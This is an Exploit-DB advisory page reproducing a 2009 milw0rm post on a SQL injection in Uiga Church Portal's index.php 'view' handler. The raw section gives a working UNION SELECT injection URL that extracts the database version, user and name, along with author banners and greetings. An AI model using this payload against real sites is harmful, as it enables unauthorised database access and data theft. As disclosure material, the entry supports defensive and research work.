Remote SQL Injection Vulnerability ( index.php view )

vendor:

Uiga Church Portal

by:

Mr.SQL

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Uiga Church Portal

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Remote SQL Injection Vulnerability ( index.php view )

A vulnerability in Uiga Church Portal allows an attacker to inject arbitrary SQL commands via the 'view' parameter in index.php. This can be exploited to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( index.php view )
##
## Uiga Church Portal
##
## http://www.scriptdevelopers.net/products/ucp.html
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.55a.NeT
##
## Email  : SQL@Hotmail.iT
##
########################
########################
##
## -[[: Exploite :]]-
##
## www.TraGeT.CoM/index.php?view=calendar&month=1&year=1+and+1=0+union+select+1,2,3,4,5,concat_ws(0x3a,@@version,user(),database()),7--
##
########################
########################
GET THE INFO IN THE CALENDAR : )

#########################################################################################################
#########################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
                                        
:: HaCkEr_EGy :: Dark MaSTer  :: His0k4 :: User-Ma$keN :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
#########################################################################################################
#########################################################################################################

# milw0rm.com [2009-08-27]